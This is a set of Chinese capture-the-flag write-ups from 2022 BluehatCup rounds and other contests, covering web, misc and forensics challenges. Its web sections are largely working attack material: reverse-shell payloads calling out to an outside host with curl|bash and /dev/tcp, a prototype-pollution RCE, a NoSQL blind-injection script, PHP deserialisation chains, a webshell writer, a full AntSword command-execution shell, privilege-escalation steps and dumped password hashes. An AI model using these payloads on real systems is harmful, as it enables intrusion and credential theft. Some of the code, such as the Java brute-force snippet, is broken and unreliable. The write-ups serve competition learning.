onv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&0=curl 118.x.x.164|bash

弹个shell,发现flag在根目录,无权限,发现date命令可以suid提权

image

/bin/date -f /flag

image

Web2:step_by_step-v3

<?php
class yang
{
    public $y1;

    /*public function __construct()
    {
        $this->y1->magic();
    }*/

    public function __tostring()
    {
        ($this->y1)();
    }

    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}

class cheng
{
    public $c1;

    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }

    public function __invoke()
    {
        $this->c1->hint();
    }
}

class bei
{
    public $b1;
    public $b2;

    public function __set($k1,$k2)
    {
        print $this->b1;
    }

    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}

$yang = new yang();
$cheng = new cheng();
$bei = new bei();

$yang->y1 = $bei;
$yang->y1->b1 = new yang();
$yang->y1->b1->y1 = 'phpinfo';

$cheng->c1 = $bei;

print_r(serialize([$yang,$cheng]));

?>

image

Web3:EzNode1

写个脚本盲注:

import requests
import string

url = 'url'
passwd=''

for i in string.printable:
    payload = """{"username":'administrator',"password":{"$regex":'^%s"}}""" % (passwd + i)
    headers = {'Content-Type':'application/json'}

r = requests.post(url=url,headers=headers,data=payload)

if 'Are' in r.text:
    password += i
    print("%s" % (passwd))

username:administrator
password:tHe_pAsSw0rd_thAt_y0u_NeVer_Kn0w

image

/source目录下有源码,审计一下:

var express = require('express');
var mongoose = require('mongoose');
var bodyParser = require('body-parser');
var fs = require('fs');
var lodash = require('lodash');
var session = require('express-session');
var randomize = require('randomatic');

mongoose.connect('mongodb://localhost/ctf', { useNewUrlParser: true });

......

app.set('views', './views');
app.set('view engine', 'ejs');
app.use('/static', express.static('static'));

......

app.get('/', (req, res, next) => {

    if(req.session.admin === undefined || req.session.admin === null) {
        res.redirect('/login');
    } else {
        res.redirect('/home');
    }
})

// login
app.all('/login', function(req, res) {

    ......

});

app.all('/home', function(req, res) {

    if(!req.session.admin) {
        return res.redirect('/');
    }

    if(req.session.data !== undefined && req.session.data !== null) {
        res.render('home.ejs', {
            real_name: req.session.data.realname,
            age: req.session.data.age
        });
    }
 else {
        res.render('home.ejs', {
            real_name: 'Undefined',
            age: 'Undefined'
        });
    }

});

// update your info
app.all('/update', (req, res) => {

    if(!req.session.admin) {
        return res.redirect('/');
    }

    if (req.method == 'GET') {
        res.render('update.ejs');
    }

    let data = req.session.data || {realname: '', age: ''}
    if (req.method == 'POST') {
        data = lodash.merge(data, req.body);
        req.session.data = data;
        if(req.session.data.realname) {
              res.redirect('/home');
        }
    }
})

var server = app.listen(3000, '0.0.0.0', function () {

    var host = server.address().address;
    var port = server.address().port;

    console.log("listening on http://%s:%s", host, port);
});

发现是lodash.merge 以及使用了 ejs 模板,在/update 可以实现RCE

json格式传递

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/118.x.x.164/3333 0>&1\"');var __tmp2"}}

image

也是有一层提权,可以利用引入新的环境变量来提权

image

/home/bunny命令有root权限,执行一下发现是id

image

引入新的环境变量,执行命令

image

Web6:Safepop

浙江省赛原题,php的垃圾回收机制

<?php
error_reporting(E_ALL);
ini_set('display_errors', true);
highlight_file(__FILE__);
class Fun{
    private $func = 'call_user_func_array';
    public function __call($f,$p){
        call_user_func($this->func,$f,$p);
    }
    public function __wakeup(){
        $this->func = '';
        die("Don't serialize me");
    }
}

class Test{
    public function getFlag(){
        system("cat /flag?");
    }
    public function __call($f,$p){
        phpinfo();
    }
    public function __wakeup(){
        echo "serialize me?";
    }
}

class A{
    public $a;
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\n";
        }
        return $this->a->$p();
    }
}

class B{
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}
if(isset($_GET['pop'])){
    $pop = $_GET['pop'];
    $o = unserialize($pop);
    throw new Exception("no pop");
}

得到paylaod之后删除一个}或者改个数字,触发垃圾回收机制 fastdestruct 就ok

MISC

迷失幻境

取证大师打开,分析图片

image

这些图片md5相同,45不同,没有文件类型,导出,缺失文件头,进行修复

image​​

与其他任一图片进行对比

image

查看回收站,发现可莉的图片

image

导出,outguess解密

image

寻宝-fix

c3dd0c35afbc6d34298f52d7800d5ae

504B0304的倒序,编写脚本进行处理,

# -*- coding:utf-8 -*-
import binascii
a=bytes
with open("./liyou.zip","rb") as e:
    a=e.read()
# print(a)

b = binascii.hexlify(a)
hex_str = b.decode("ascii")
# print(hex_str)
# hex_str="504b01020304"
c=str()
for i in range(0,len(hex_str),2):
    c+=(hex_str[i:i+2])[::-1]
# print(c)
# y=binascii.unhexlify(c)
# print(y)

with open("llll.txt","w") as e:
    e.write(c)
import os
os.system("xxd -r -p llll.txt >kkk.zip")

解压得到游戏和压缩包

看hint,总结一下:

  1. 注意音频的钢琴
  2. 注意两种地形

在玩游戏的时候,用CE固定一下血量,防止游戏退出

DC3H8F38TZIFH9EQ37

前四关地图是变种猪圈密码,

image

OWOH

用GameMaker提取游戏资源文件,其中有mp3,听声音第四秒到第十秒,结合hint,第二段是114514

image

第三段地图是曼彻斯特编码,把每个地图联合起来

IMG_1269

01011111011000010011000101011111

image

拼接尝试一下,发现压缩包密码OWOH_a1_114514

vim打开文档,零宽隐写:

image

image

2022 BluehatCup Semi-Finals | Partly Writeup

Web

easyfatfree

扫出www.zip

直接审

image-20220804095330982

$this->write()

image-20220804095401625

\Base::instance()

image-20220804095431323

直接就能写马

<?php

namespace DB {

    class Jig {
        public $dir;
        public $data;
        public $lazy;
        public $format;
    }
}

namespace {

    $jig = new DB\Jig();
    $jig->lazy = True;
    $jig->dir = '/var/www/html/';
    $jig->data = ["shell.php" =>['<?php eval($_POST[a]); ?>']];
    $jig->format = 0;
    echo serialize($jig);
}

根目录不能写,换/ui/

image-20220804095525146

有disable_function

用蚁剑bypass

image-20220804095556257

onelinephp

非预期:

同之前国赛的一个题,flag放在了/etc/profile.d/pouchenv.sh/etc/instanceInfo

image-20220804124358948

直接cat

image-20220804124443276

预期解:

Misc

神秘的日志

看system日志,找到第一次使用ntlm的时间

image-20220804110851180

再从security日志中找到对应时间的登录日志,找最早的那个

image-20220804110950964

右键复制成文本才能看到TimeCreated SystemTime

<TimeCreated SystemTime="2022-04-17T03:27:06.7108313Z" />

image-20220804111131562

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

从http协议分析,可以找到如下代码

image-20220804145429831

解码后可以看到上传了个rsa.php

image-20220804145559703

但是rsa.php是被加密后的

phpjiami 数种解密方法 | 离别歌 (leavesongs.com)

这里采用手工dump法

image-20220804144121775

源码如下:

?><?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd);

接下来流量重放即可

修改下代码,在本地起php环境

<?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
     echo $k.":::";
     var_dump($_POST[$k]);
}
}
var_dump($cmd);
// eval($cmd);

最后一条流量显示出有flag.txt,于是看倒数第二条流量

重放解密

image-20220804145238363
image-20220804145249137

substr($_POST["k85c8f24ca50da"], 2)进行base64解码就是flag

image-20220804145325060

取证

手机取证_1

image.png

手机取证_2

image.png

exe_1

导入微步云沙箱

image.png

exe_2

导入微步云沙箱

image.png

exe_3

导入微步云沙箱

image.png

exe_4

image.png
image.png

挖矿

exe_5

导入微步云沙箱

image.png

apk2

image.png
image.png

apk3

image.png

apk反编译 发现loadUrl

apk5

反编译apk文件

image.png
image.png

apk7

MainActivity有几个分支代表有几个页面。

image.png

apk8

红星.ipa导出,解压,\123123123123213\Payload\0B5A51EA-18C7-4B3F-B1EF-1D48955CD71F\红星.app

image.png
image.png

apk12

image.png

apk13

image.png

安装软件,默认6661

apk15

image.png
image.png

2022 BluehatCup QUALS | Partly Writeup

MISC

domainhacker

提取流量中的压缩包

image.png

追踪TCP流,看一下shell

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split("/;|:/",$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir=$item."/.c46a89a";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<sizeof($cntarr);$i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out) {
    return $out;
}
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "79c2"."0b92";
    echo @asenc($output);
    echo "b4e7e"."465b62";
}
ob_start();
try {
    $p=base64_decode(substr($_POST["yee092cda97a62"],2));
    $s=base64_decode(substr($_POST["q8fb9d4c082c11"],2));
    $envstr=@base64_decode(substr($_POST["p48a6d55fac1b1"],2));

    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
    if(substr($d,0,1)=="/") {
        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if(!empty($envstr)) {
        $envarr=explode("|||asline|||", $envstr);
        foreach($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r="{$p} {$c}";
    function fe($f) {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)) {
            $d=array();
        } else {
            $d=array_map('trim',array_map('strtolower',$d));
        }
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
    ;
    function runshellshock($d, $c) {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }
    ;
    function runcmd($c) {
        $ret=0;
        $d=dirname($_SERVER["SCRIPT_FILENAME"]);
        if(fe('system')) {
            @system($c,$ret);
        } elseif(fe('passthru')) {
            @passthru($c,$ret);
        } elseif(fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif(fe('exec')) {
            @exec($c,$o,$ret);
            print(join("",$o));
        } elseif(fe('popen')) {
            $fp=@popen($c,'r');
            while(!@feof($fp)) {
                print(@fgets($fp,2048));
            }
            @pclose($fp);
        } elseif(fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while(!@feof($io[1])) {
                print(@fgets($io[1],2048));
            }
            while(!@feof($io[2])) {
                print(@fgets($io[2],2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif(fe('antsystem')) {
            @antsystem($c);
        } elseif(runshellshock($d, $c)) {
            return $ret;
        } elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
            $w=new COM('WScript.shell');
            $e=$w->exec($c);
            $so=$e->StdOut();
            $ret.=$so->ReadAll();
            $se=$e->StdErr();
            $ret.=$se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }
    ;
    $ret=@runcmd($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die()

在TCP第13流发现压缩包密码,

image.png

image.png

解压以后发现是mimikatz记录,查看NTLM ,即为flag

image.png

flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

在流量包提取压缩包密码:

image.png

image.png

解压以后,获得ntds.dit SYSTEM SECURITY文件,放到同一目录下然后用impacket进行解密

 python3 secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -history

image.png

image.png

因为题目要求是之前的hash,所以要获取之前的hash值

flag{07ab403ab740c1540c378b0f5aaa4087}

WEB

Ez_gadget

参考链接:红队武器库:fastjson小于1.2.68全漏洞RCE利用exp (zeo.cool)

工具链接:https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar

fastjson1.2.62 需要爆破key

脚本:

package baopo;
public class baopo{
    public static void main (String[] args){
        for (int i = 0;i < 999999999;i++){
            int key = String.valueOf(i).hashCode() ==key){
                System.out.pintln(i)
            }
        }
    }
}

8179E06F-B82B-D1DC-0A21-2B15A0D360F1.jpg

在自己服务器上启动服务

java -cp fastjson_tool.jar fastjson.HRMIServer x.x.x.x 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/6666 0>&1"

但是黑名单过滤了\x,只需要unicode编码就可以绕过。要把rmi用unicode编码

FB225DDB-1F40-4148-32AC-B9440B19D669.jpg

DB9A3FF6-09F2-5295-C839-0E3C2A13546B.jpg

flag{e513e5cc-b3ba-4451-8027-6f213b4ffedf}

取证

手机取证_1

直接查找文件名,

image.png

导出查看:

image.png

360x360

手机取证_2

搜索关键字,在Skype中的群组有聊天记录:

image.png

计算机取证_1

PS D:\volatility_2.6_win64_standalone> ./volatility_2.6_win64_standalone.exe -f F:\2022bluecat\1.dmp --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
taqi7:1000:aad3b435b51404eeaad3b435b51404ee:7f21caca5685f10d9e849cc84c340528:::
naizheng:1002:aad3b435b51404eeaad3b435b51404ee:d123b09e13b1a82277c3e3f0ca722060:::
qinai:1003:aad3b435b51404eeaad3b435b51404ee:1c333843181864a58156f3e9498fe905:::

image.png

anxinqi

计算机取证_2

利用取证大师工具集获取内存文件信息

image.png

image.png

2192

计算机分析_3

利用取证大师工具集获取bitlocker密钥文件

image.png

导出后对镜像进行解密,

image.png有两个Office文件,两个文档,其中pass.txt是密码集

先对word文档进行解密,可以采用手撕的方式,word文档密码是:688561

image.png没有其他信息,

看powerpoint文档,手撕密码:287fuweiuhfiute

image.png

计算机取证_4

加密文档采用了True_crypt加密,尝试利用取证大师工具集获取密钥文件进行解密,结果失败。

导出文件,Passware kit制作镜像

image.png

image.png

用取证大师加载新生成的文件

image.png

爆破压缩包密码:CHV@06KVAIP9YA8W5VTF.png

得到flag

image.png

程序分析_1

image.png

程序分析_2

image.png

程序分析_3

image.png

解密发现确实是服务器地址

image.png

程序分析_4

package d.a.a.c.a

1KV0@UW9L600WC60M9.jpg

进行跟踪

image.png

答案是a

网站取证_1

网站源码过一遍D盾就有

image.png

lanmaobei666

网站取证_2

数据库配置文件在

application\database.php

image.png

encrypt/encrypt.php查看一下,然后想办法输出出来:

<?php
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;

遇到报错Call to undefined function: mcrypt_module_open()的话是PHP版本过高缺少一个dll文件,下载到php扩展目录下然后修改php.ini即可

image.png

网站取证_3

application\admin\controller目录下Channelorder.php就有

image.png

网站取证_4

对比bak.sql发现数据:

image.png

张宝 :3

王子豪 : 5

image.png

前面是收款人,后面是付款人,所以顺序就是5, 3

对4月2日至4月18日之中,符合付款顺序的记录进行提取

INSERT INTO "public"."tab_channel_order_list" VALUES (142, '943617668819', 'GG币', NULL, '2022-04-02 01:16:26', 5, 3, 'mZVymm9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (144, '588047503620', 'GG币', NULL, '2022-04-02 01:47:16', 5, 3, 'lpxqlXFo');
INSERT INTO "public"."tab_channel_order_list" VALUES (150, '597613045539', 'GG币', NULL, '2022-04-02 02:32:02', 5, 3, 'l5xummto');
INSERT INTO "public"."tab_channel_order_list" VALUES (167, '368360644631', 'GG币', NULL, '2022-04-02 03:46:25', 5, 3, 'm5Zwm3Bn');
INSERT INTO "public"."tab_channel_order_list" VALUES (187, '704008760599', 'GG币', NULL, '2022-04-02 06:53:30', 5, 3, 'nJhtlGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (189, '695829830065', 'GG币', NULL, '2022-04-02 06:57:22', 5, 3, 'm5tpmGtm');
INSERT INTO "public"."tab_channel_order_list" VALUES (197, '689591506416', 'GG币', NULL, '2022-04-02 08:09:16', 5, 3, 'm5ptnGtu');
INSERT INTO "public"."tab_channel_order_list" VALUES (199, '296524099918', 'GG币', NULL, '2022-04-02 08:29:29', 5, 3, 'mZlym25r');
INSERT INTO "public"."tab_channel_order_list" VALUES (209, '202884729901', 'GG币', NULL, '2022-04-02 09:39:39', 5, 3, 'm5hpnHBu');
INSERT INTO "public"."tab_channel_order_list" VALUES (210, '955226714946', 'GG币', NULL, '2022-04-02 09:47:09', 5, 3, 'm5prlm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (227, '421623628935', 'GG币', NULL, '2022-04-02 12:33:01', 5, 3, 'nJlyl2hu');
INSERT INTO "public"."tab_channel_order_list" VALUES (245, '228102248133', 'GG币', NULL, '2022-04-02 15:05:53', 5, 3, 'lptummhs');
INSERT INTO "public"."tab_channel_order_list" VALUES (263, '279069782487', 'GG币', NULL, '2022-04-02 17:33:06', 5, 3, 'lpxrl21n');
INSERT INTO "public"."tab_channel_order_list" VALUES (317, '911539892864', 'GG币', NULL, '2022-04-03 00:44:48', 5, 3, 'mZRpnHBs');
INSERT INTO "public"."tab_channel_order_list" VALUES (358, '940690024660', 'GG币', NULL, '2022-04-03 06:12:18', 5, 3, 'mZpxm2lr');
INSERT INTO "public"."tab_channel_order_list" VALUES (371, '703759626723', 'GG币', NULL, '2022-04-03 08:02:01', 5, 3, 'm5dtmGls');
INSERT INTO "public"."tab_channel_order_list" VALUES (405, '250826052511', 'GG币', NULL, '2022-04-03 11:58:42', 5, 3, 'mpxvlnBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (418, '699369204729', 'GG币', NULL, '2022-04-03 13:26:10', 5, 3, 'mJpynHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (441, '110783516494', 'GG币', NULL, '2022-04-03 17:08:54', 5, 3, 'nJZwm2lu');
INSERT INTO "public"."tab_channel_order_list" VALUES (448, '754012259548', 'GG币', NULL, '2022-04-03 17:41:43', 5, 3, 'mpdtnWxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (452, '999734985528', 'GG币', NULL, '2022-04-03 18:54:29', 5, 3, 'nJdtlmpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (457, '259291480194', 'GG币', NULL, '2022-04-03 20:24:01', 5, 3, 'mZtymHBm');
INSERT INTO "public"."tab_channel_order_list" VALUES (468, '672136643928', 'GG币', NULL, '2022-04-03 22:11:12', 5, 3, 'nJlslmpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (486, '995091488940', 'GG币', NULL, '2022-04-04 00:49:53', 5, 3, 'l5RunW1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (493, '369911062367', 'GG币', NULL, '2022-04-04 02:05:32', 5, 3, 'nJxplXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (494, '627743356329', 'GG币', NULL, '2022-04-04 02:14:49', 5, 3, 'lZdpmm1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (496, '341907225040', 'GG币', NULL, '2022-04-04 02:21:29', 5, 3, 'mZZwnW9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (541, '505274522158', 'GG币', NULL, '2022-04-04 09:38:59', 5, 3, 'mJVrmmhp');
INSERT INTO "public"."tab_channel_order_list" VALUES (558, '465727738353', 'GG币', NULL, '2022-04-04 11:36:57', 5, 3, 'lZZwl3Bs');
INSERT INTO "public"."tab_channel_order_list" VALUES (575, '801973338928', 'GG币', NULL, '2022-04-04 13:50:29', 5, 3, 'm5xvm2hm');
INSERT INTO "public"."tab_channel_order_list" VALUES (588, '990446771976', 'GG币', NULL, '2022-04-04 15:55:49', 5, 3, 'mpZslmpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (595, '443752577679', 'GG币', NULL, '2022-04-04 17:12:14', 5, 3, 'mZtrnGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (598, '274195438646', 'GG币', NULL, '2022-04-04 17:52:24', 5, 3, 'lp1rm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (605, '389442476686', 'GG币', NULL, '2022-04-04 18:47:30', 5, 3, 'nJxplmtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (651, '840764463035', 'GG币', NULL, '2022-04-05 01:50:13', 5, 3, 'l5twlXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (667, '575571956339', 'GG币', NULL, '2022-04-05 04:36:41', 5, 3, 'lphqmm9s');
INSERT INTO "public"."tab_channel_order_list" VALUES (693, '369199269150', 'GG币', NULL, '2022-04-05 07:36:54', 5, 3, 'm51wmG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (706, '299510640482', 'GG币', NULL, '2022-04-05 09:39:18', 5, 3, 'mJlxlWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (731, '660695028585', 'GG币', NULL, '2022-04-05 13:44:39', 5, 3, 'lJ1vmXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (738, '856482910335', 'GG币', NULL, '2022-04-05 14:17:50', 5, 3, 'mpVpmW5r');
INSERT INTO "public"."tab_channel_order_list" VALUES (756, '750042176098', 'GG币', NULL, '2022-04-05 17:02:30', 5, 3, 'm5lrlGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (784, '651691106346', 'GG币', NULL, '2022-04-05 23:00:37', 5, 3, 'mpxplm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (786, '255787712926', 'GG币', NULL, '2022-04-05 23:14:45', 5, 3, 'lZpxnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (791, '135691319557', 'GG币', NULL, '2022-04-06 00:05:58', 5, 3, 'nJdymWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (819, '788431214978', 'GG币', NULL, '2022-04-06 04:11:14', 5, 3, 'mJpum3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (850, '851409238798', 'GG币', NULL, '2022-04-06 09:01:35', 5, 3, 'lpRrmWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (873, '260951952586', 'GG币', NULL, '2022-04-06 12:48:13', 5, 3, 'lZtunXBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (885, '231265027253', 'GG币', NULL, '2022-04-06 15:07:16', 5, 3, 'lpprnWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (930, '262701249039', 'GG币', NULL, '2022-04-06 21:47:06', 5, 3, 'lJdslnBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (977, '184134048308', 'GG币', NULL, '2022-04-07 04:24:51', 5, 3, 'lJZrnWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (979, '391202213852', 'GG币', NULL, '2022-04-07 04:29:53', 5, 3, 'l5Zrm21m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1004, '325182412061', 'GG币', NULL, '2022-04-07 08:23:24', 5, 3, 'lJdul2hm');
